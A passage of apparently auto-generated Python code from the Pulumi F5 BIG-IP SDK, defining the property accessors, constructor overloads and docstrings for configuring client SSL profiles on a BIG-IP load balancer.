pulumi.set(__self__, "session_mirroring", session_mirroring)
if session_ticket is not None:
pulumi.set(__self__, "session_ticket", session_ticket)
if sni_default is not None:
pulumi.set(__self__, "sni_default", sni_default)
if sni_require is not None:
pulumi.set(__self__, "sni_require", sni_require)
if ssl_c3d is not None:
pulumi.set(__self__, "ssl_c3d", ssl_c3d)
if ssl_forward_proxy is not None:
pulumi.set(__self__, "ssl_forward_proxy", ssl_forward_proxy)
if ssl_forward_proxy_bypass is not None:
pulumi.set(__self__, "ssl_forward_proxy_bypass", ssl_forward_proxy_bypass)
if ssl_sign_hash is not None:
pulumi.set(__self__, "ssl_sign_hash", ssl_sign_hash)
if strict_resume is not None:
pulumi.set(__self__, "strict_resume", strict_resume)
if tm_options is not None:
pulumi.set(__self__, "tm_options", tm_options)
if unclean_shutdown is not None:
pulumi.set(__self__, "unclean_shutdown", unclean_shutdown)
@property
@pulumi.getter(name="alertTimeout")
def alert_timeout(self) -> Optional[pulumi.Input[str]]:
"""
Alert time out
"""
return pulumi.get(self, "alert_timeout")
@alert_timeout.setter
def alert_timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alert_timeout", value)
@property
@pulumi.getter(name="allowNonSsl")
def allow_non_ssl(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables acceptance of non-SSL connections. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "allow_non_ssl")
@allow_non_ssl.setter
def allow_non_ssl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "allow_non_ssl", value)
@property
@pulumi.getter
def authenticate(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the frequency of client authentication for an SSL session. When `once`, specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
"""
return pulumi.get(self, "authenticate")
@authenticate.setter
def authenticate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authenticate", value)
@property
@pulumi.getter(name="authenticateDepth")
def authenticate_depth(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of certificates to be traversed in a client certificate chain
"""
return pulumi.get(self, "authenticate_depth")
@authenticate_depth.setter
def authenticate_depth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "authenticate_depth", value)
@property
@pulumi.getter(name="c3dClientFallbackCert")
def c3d_client_fallback_cert(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
"""
return pulumi.get(self, "c3d_client_fallback_cert")
@c3d_client_fallback_cert.setter
def c3d_client_fallback_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_client_fallback_cert", value)
@property
@pulumi.getter(name="c3dDropUnknownOcspStatus")
def c3d_drop_unknown_ocsp_status(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the connection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
"""
return pulumi.get(self, "c3d_drop_unknown_ocsp_status")
@c3d_drop_unknown_ocsp_status.setter
def c3d_drop_unknown_ocsp_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_drop_unknown_ocsp_status", value)
@property
@pulumi.getter(name="c3dOcsp")
def c3d_ocsp(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
"""
return pulumi.get(self, "c3d_ocsp")
@c3d_ocsp.setter
def c3d_ocsp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_ocsp", value)
@property
@pulumi.getter(name="caFile")
def ca_file(self) -> Optional[pulumi.Input[str]]:
"""
Client certificate file path. Default None.
"""
return pulumi.get(self, "ca_file")
@ca_file.setter
def ca_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_file", value)
@property
@pulumi.getter(name="cacheSize")
def cache_size(self) -> Optional[pulumi.Input[int]]:
"""
Cache size (sessions).
"""
return pulumi.get(self, "cache_size")
@cache_size.setter
def cache_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cache_size", value)
@property
@pulumi.getter(name="cacheTimeout")
def cache_timeout(self) -> Optional[pulumi.Input[int]]:
"""
Cache time out
"""
return pulumi.get(self, "cache_timeout")
@cache_timeout.setter
def cache_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cache_timeout", value)
@property
@pulumi.getter
def cert(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a cert name for use.
"""
return pulumi.get(self, "cert")
@cert.setter
def cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert", value)
@property
@pulumi.getter(name="certExtensionIncludes")
def cert_extension_includes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Cert extension includes for SSL forward proxy
"""
return pulumi.get(self, "cert_extension_includes")
@cert_extension_includes.setter
def cert_extension_includes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cert_extension_includes", value)
@property
@pulumi.getter(name="certKeyChains")
def cert_key_chains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]]:
return pulumi.get(self, "cert_key_chains")
@cert_key_chains.setter
def cert_key_chains(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]]):
pulumi.set(self, "cert_key_chains", value)
@property
@pulumi.getter(name="certLifeSpan")
def cert_life_span(self) -> Optional[pulumi.Input[int]]:
"""
Life span of the certificate in days for SSL forward proxy
"""
return pulumi.get(self, "cert_life_span")
@cert_life_span.setter
def cert_life_span(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cert_life_span", value)
@property
@pulumi.getter(name="certLookupByIpaddrPort")
def cert_lookup_by_ipaddr_port(self) -> Optional[pulumi.Input[str]]:
"""
Cert lookup by IP address and port (enabled / disabled)
"""
return pulumi.get(self, "cert_lookup_by_ipaddr_port")
@cert_lookup_by_ipaddr_port.setter
def cert_lookup_by_ipaddr_port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert_lookup_by_ipaddr_port", value)
@property
@pulumi.getter
def chain(self) -> Optional[pulumi.Input[str]]:
"""
Contains a certificate chain that is relevant to the certificate and key mentioned earlier. This parameter is optional.
"""
return pulumi.get(self, "chain")
@chain.setter
def chain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "chain", value)
@property
@pulumi.getter
def ciphers(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
"""
return pulumi.get(self, "ciphers")
@ciphers.setter
def ciphers(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ciphers", value)
@property
@pulumi.getter(name="clientCertCa")
def client_cert_ca(self) -> Optional[pulumi.Input[str]]:
"""
client certificate name
"""
return pulumi.get(self, "client_cert_ca")
@client_cert_ca.setter
def client_cert_ca(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_cert_ca", value)
@property
@pulumi.getter(name="crlFile")
def crl_file(self) -> Optional[pulumi.Input[str]]:
"""
Certificate revocation file name
"""
return pulumi.get(self, "crl_file")
@crl_file.setter
def crl_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "crl_file", value)
@property
@pulumi.getter(name="defaultsFrom")
def defaults_from(self) -> Optional[pulumi.Input[str]]:
"""
Parent profile for this clientssl profile. Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It should be a full path, e.g. `/partition/profile_name`.
"""
return pulumi.get(self, "defaults_from")
@defaults_from.setter
def defaults_from(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "defaults_from", value)
@property
@pulumi.getter(name="forwardProxyBypassDefaultAction")
def forward_proxy_bypass_default_action(self) -> Optional[pulumi.Input[str]]:
"""
Forward proxy bypass default action. (enabled / disabled)
"""
return pulumi.get(self, "forward_proxy_bypass_default_action")
@forward_proxy_bypass_default_action.setter
def forward_proxy_bypass_default_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "forward_proxy_bypass_default_action", value)
@property
@pulumi.getter(name="fullPath")
def full_path(self) -> Optional[pulumi.Input[str]]:
"""
full path of the profile
"""
return pulumi.get(self, "full_path")
@full_path.setter
def full_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "full_path", value)
@property
@pulumi.getter
def generation(self) -> Optional[pulumi.Input[int]]:
"""
generation
"""
return pulumi.get(self, "generation")
@generation.setter
def generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "generation", value)
@property
@pulumi.getter(name="genericAlert")
def generic_alert(self) -> Optional[pulumi.Input[str]]:
"""
Generic alerts enabled / disabled.
"""
return pulumi.get(self, "generic_alert")
@generic_alert.setter
def generic_alert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "generic_alert", value)
@property
@pulumi.getter(name="handshakeTimeout")
def handshake_timeout(self) -> Optional[pulumi.Input[str]]:
"""
Handshake time out (seconds)
"""
return pulumi.get(self, "handshake_timeout")
@handshake_timeout.setter
def handshake_timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "handshake_timeout", value)
@property
@pulumi.getter(name="inheritCertKeychain")
def inherit_cert_keychain(self) -> Optional[pulumi.Input[str]]:
"""
Inherit cert key chain
"""
return pulumi.get(self, "inherit_cert_keychain")
@inherit_cert_keychain.setter
def inherit_cert_keychain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "inherit_cert_keychain", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Contains a key name
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="modSslMethods")
def mod_ssl_methods(self) -> Optional[pulumi.Input[str]]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mod_ssl_methods")
@mod_ssl_methods.setter
def mod_ssl_methods(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mod_ssl_methods", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the profile mode, which enables or disables SSL processing (enabled / disabled).
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mode", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the profile. The name should be a full path, which is the combination of the `partition + profile name`, for example `/Common/test-clientssl-profile`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def partition(self) -> Optional[pulumi.Input[str]]:
"""
name of partition
"""
return pulumi.get(self, "partition")
@partition.setter
def partition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partition", value)
@property
@pulumi.getter
def passphrase(self) -> Optional[pulumi.Input[str]]:
"""
Client Certificate Constrained Delegation CA passphrase
"""
return pulumi.get(self, "passphrase")
@passphrase.setter
def passphrase(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "passphrase", value)
@property
@pulumi.getter(name="peerCertMode")
def peer_cert_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the way the system handles client certificates. When `ignore`, the system ignores certificates from client systems. When `require`, the system requires a client to present a valid certificate. When `request`, the system requests a valid certificate from a client but always authenticates the client.
"""
return pulumi.get(self, "peer_cert_mode")
@peer_cert_mode.setter
def peer_cert_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peer_cert_mode", value)
@property
@pulumi.getter(name="proxyCaCert")
def proxy_ca_cert(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Cert
"""
return pulumi.get(self, "proxy_ca_cert")
@proxy_ca_cert.setter
def proxy_ca_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_cert", value)
@property
@pulumi.getter(name="proxyCaKey")
def proxy_ca_key(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Key
"""
return pulumi.get(self, "proxy_ca_key")
@proxy_ca_key.setter
def proxy_ca_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_key", value)
@property
@pulumi.getter(name="proxyCaPassphrase")
def proxy_ca_passphrase(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Passphrase
"""
return pulumi.get(self, "proxy_ca_passphrase")
@proxy_ca_passphrase.setter
def proxy_ca_passphrase(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_passphrase", value)
@property
@pulumi.getter(name="proxySsl")
def proxy_ssl(self) -> Optional[pulumi.Input[str]]:
"""
Proxy SSL enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl")
@proxy_ssl.setter
def proxy_ssl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ssl", value)
@property
@pulumi.getter(name="proxySslPassthrough")
def proxy_ssl_passthrough(self) -> Optional[pulumi.Input[str]]:
"""
Proxy SSL passthrough enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl_passthrough")
@proxy_ssl_passthrough.setter
def proxy_ssl_passthrough(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ssl_passthrough", value)
@property
@pulumi.getter(name="renegotiatePeriod")
def renegotiate_period(self) -> Optional[pulumi.Input[str]]:
"""
Renegotiate Period (seconds)
"""
return pulumi.get(self, "renegotiate_period")
@renegotiate_period.setter
def renegotiate_period(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiate_period", value)
@property
@pulumi.getter(name="renegotiateSize")
def renegotiate_size(self) -> Optional[pulumi.Input[str]]:
"""
Renegotiate Size
"""
return pulumi.get(self, "renegotiate_size")
@renegotiate_size.setter
def renegotiate_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiate_size", value)
@property
@pulumi.getter
def renegotiation(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables SSL renegotiation. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "renegotiation")
@renegotiation.setter
def renegotiation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiation", value)
@property
@pulumi.getter(name="retainCertificate")
def retain_certificate(self) -> Optional[pulumi.Input[str]]:
"""
When `true`, client certificate is retained in SSL session.
"""
return pulumi.get(self, "retain_certificate")
@retain_certificate.setter
def retain_certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "retain_certificate", value)
@property
@pulumi.getter(name="secureRenegotiation")
def secure_renegotiation(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the method of secure renegotiation for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When set to `request`, the system requests secure renegotiation of SSL connections.
`require` is the default setting; when set, the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
When set to `require-strict`, the system requires strict renegotiation of SSL connections; in this mode the system refuses connections to insecure servers and terminates existing SSL connections to insecure servers.
"""
return pulumi.get(self, "secure_renegotiation")
@secure_renegotiation.setter
def secure_renegotiation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secure_renegotiation", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile. The server name can also be a wildcard string containing the asterisk `*` character.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter(name="sessionMirroring")
def session_mirroring(self) -> Optional[pulumi.Input[str]]:
"""
Session Mirroring (enabled / disabled)
"""
return pulumi.get(self, "session_mirroring")
@session_mirroring.setter
def session_mirroring(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_mirroring", value)
@property
@pulumi.getter(name="sessionTicket")
def session_ticket(self) -> Optional[pulumi.Input[str]]:
"""
Session Ticket (enabled / disabled)
"""
return pulumi.get(self, "session_ticket")
@session_ticket.setter
def session_ticket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_ticket", value)
@property
@pulumi.getter(name="sniDefault")
def sni_default(self) -> Optional[pulumi.Input[str]]:
"""
Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support. When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
"""
return pulumi.get(self, "sni_default")
@sni_default.setter
def sni_default(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sni_default", value)
@property
@pulumi.getter(name="sniRequire")
def sni_require(self) -> Optional[pulumi.Input[str]]:
"""
Requires that the network peers also provide SNI support. This setting only takes effect when `sni_default` is set to `true`. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "sni_require")
@sni_require.setter
def sni_require(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sni_require", value)
@property
@pulumi.getter(name="sslC3d")
def ssl_c3d(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables SSL client certificate constrained delegation. The default option is disabled; specify enabled to use SSL client certificate constrained delegation.
"""
return pulumi.get(self, "ssl_c3d")
@ssl_c3d.setter
def ssl_c3d(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_c3d", value)
@property
@pulumi.getter(name="sslForwardProxy")
def ssl_forward_proxy(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy")
@ssl_forward_proxy.setter
def ssl_forward_proxy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_forward_proxy", value)
@property
@pulumi.getter(name="sslForwardProxyBypass")
def ssl_forward_proxy_bypass(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy_bypass")
@ssl_forward_proxy_bypass.setter
def ssl_forward_proxy_bypass(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_forward_proxy_bypass", value)
@property
@pulumi.getter(name="sslSignHash")
def ssl_sign_hash(self) -> Optional[pulumi.Input[str]]:
"""
SSL sign hash (any, sha1, sha256, sha384)
"""
return pulumi.get(self, "ssl_sign_hash")
@ssl_sign_hash.setter
def ssl_sign_hash(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_sign_hash", value)
@property
@pulumi.getter(name="strictResume")
def strict_resume(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables the resumption of SSL sessions after an unclean shutdown. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "strict_resume")
@strict_resume.setter
def strict_resume(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "strict_resume", value)
@property
@pulumi.getter(name="tmOptions")
def tm_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of enabled options, selected from a set of industry-standard options for handling SSL processing. By default,
`Don't insert empty fragments` and `No TLSv1.3` are listed as enabled options. Usage: `tm_options = ["dont-insert-empty-fragments", "no-tlsv1.3"]`
"""
return pulumi.get(self, "tm_options")
@tm_options.setter
def tm_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tm_options", value)
@property
@pulumi.getter(name="uncleanShutdown")
def unclean_shutdown(self) -> Optional[pulumi.Input[str]]:
"""
Unclean Shutdown (enabled / disabled)
"""
return pulumi.get(self, "unclean_shutdown")
@unclean_shutdown.setter
def unclean_shutdown(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unclean_shutdown", value)
class ProfileClientSsl(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProfileClientSslCertKeyChainArgs']]]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
`ltm.ProfileClientSsl` Manages client SSL profiles on a BIG-IP.
Resources should be named with their "full path". The full path is the combination of the partition + name (for example: `/Common/my-pool`) or partition + directory + name of the resource (for example: `/Common/test/my-pool`).
## Example Usage
```python
import pulumi
import pulumi_f5bigip as f5bigip
test__client_ssl = f5bigip.ltm.ProfileClientSsl("test-ClientSsl",
authenticate="always",
ciphers="DEFAULT",
defaults_from="/Common/clientssl",
name="/Common/test-ClientSsl")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] alert_timeout: Alert time out
:param pulumi.Input[str] allow_non_ssl: Enables or disables acceptance of non-SSL connections. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] authenticate: Specifies the frequency of client authentication for an SSL session. When `once`, the system authenticates the client once per SSL session.
When `always`, the system authenticates the client once per SSL session and also upon reuse of that session.
:param pulumi.Input[int] authenticate_depth: Specifies the maximum number of certificates to be traversed in a client certificate chain
:param pulumi.Input[str] c3d_client_fallback_cert: Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
:param pulumi.Input[str] c3d_drop_unknown_ocsp_status: Specifies the BIG-IP action when the OCSP responder returns an unknown status. The default value is `drop`, which causes the connection to be dropped. Conversely, you can specify `ignore`, which causes the connection to ignore the unknown status and continue.
:param pulumi.Input[str] c3d_ocsp: Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
:param pulumi.Input[str] ca_file: Client certificate file path. Default None.
:param pulumi.Input[int] cache_size: Cache size (sessions).
:param pulumi.Input[int] cache_timeout: Cache time out
:param pulumi.Input[str] cert: Specifies a cert name for use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cert_extension_includes: Cert extension includes for ssl forward proxy
:param pulumi.Input[int] cert_life_span: Life span of the certificate in days for ssl forward proxy
:param pulumi.Input[str] cert_lookup_by_ipaddr_port: Cert lookup by ip address and port enabled / disabled
:param pulumi.Input[str] chain: Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
:param pulumi.Input[str] ciphers: Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
:param pulumi.Input[str] client_cert_ca: client certificate name
:param pulumi.Input[str] crl_file: Certificate revocation file name
:param pulumi.Input[str] defaults_from: Parent profile for this clientssl profile. Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It should be the full path `/partition/profile_name`.
:param pulumi.Input[str] forward_proxy_bypass_default_action: Forward proxy bypass default action. (enabled / disabled)
:param pulumi.Input[str] full_path: full path of the profile
:param pulumi.Input[int] generation: generation
:param pulumi.Input[str] generic_alert: Generic alerts enabled / disabled.
:param pulumi.Input[str] handshake_timeout: Handshake time out (seconds)
:param pulumi.Input[str] inherit_cert_keychain: Inherit cert key chain
:param pulumi.Input[str] key: Contains a key name
:param pulumi.Input[str] mod_ssl_methods: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] mode: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] name: Specifies the name of the profile. The name should be the full path, which is the combination of the `partition + profile name`, for example `/Common/test-clientssl-profile`.
:param pulumi.Input[str] partition: name of partition
:param pulumi.Input[str] passphrase: Client Certificate Constrained Delegation CA passphrase
:param pulumi.Input[str] peer_cert_mode: Specifies the way the system handles client certificates. When `ignore`, the system ignores certificates from client systems. When `require`, the system requires a client to present a valid certificate. When `request`, the system requests a valid certificate from a client but always authenticates the client.
:param pulumi.Input[str] proxy_ca_cert: Proxy CA Cert
:param pulumi.Input[str] proxy_ca_key: Proxy CA Key
:param pulumi.Input[str] proxy_ca_passphrase: Proxy CA Passphrase
:param pulumi.Input[str] proxy_ssl: Proxy SSL enabled / disabled. Default is disabled.
:param pulumi.Input[str] proxy_ssl_passthrough: Proxy SSL passthrough enabled / disabled. Default is disabled.
:param pulumi.Input[str] renegotiate_period: Renegotiate Period (seconds)
:param pulumi.Input[str] renegotiate_size: Renegotiate Size
:param pulumi.Input[str] renegotiation: Enables or disables SSL renegotiation. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] retain_certificate: When `true`, client certificate is retained in SSL session.
:param pulumi.Input[str] secure_renegotiation: Specifies the method of secure renegotiation for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When set to `request`, the system requests secure renegotiation of SSL connections.
`require` is the default setting; when set, the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
When set to `require-strict`, the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers.
:param pulumi.Input[str] server_name: Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile. The server name can also be a wildcard string containing the asterisk `*` character.
:param pulumi.Input[str] session_mirroring: Session Mirroring (enabled / disabled)
:param pulumi.Input[str] session_ticket: Session Ticket (enabled / disabled)
:param pulumi.Input[str] sni_default: Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support. When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
:param pulumi.Input[str] sni_require: Requires that the network peers also provide SNI support; this setting only takes effect when `sni_default` is set to `true`. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] ssl_c3d: Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
:param pulumi.Input[str] ssl_forward_proxy: Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_forward_proxy_bypass: Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_sign_hash: SSL sign hash (any, sha1, sha256, sha384)
:param pulumi.Input[str] strict_resume: Enables or disables the resumption of SSL sessions after an unclean shutdown. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tm_options: List of enabled options, selected from a set of industry-standard options for handling SSL processing. By default,
`Don't insert empty fragments` and `No TLSv1.3` are listed as enabled options. Usage: `tm_options = ["dont-insert-empty-fragments", "no-tlsv1.3"]`.
:param pulumi.Input[str] unclean_shutdown: Unclean Shutdown (enabled / disabled)
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ProfileClientSslArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
`ltm.ProfileClientSsl` Manages client SSL profiles on a BIG-IP.
Resources should be named with their "full path". The full path is the combination of the partition + name (for example: `/Common/my-pool`) or partition + directory + name of the resource (for example: `/Common/test/my-pool`).
## Example Usage
```python
import pulumi
import pulumi_f5bigip as f5bigip
test__client_ssl = f5bigip.ltm.ProfileClientSsl("test-ClientSsl",
authenticate="always",
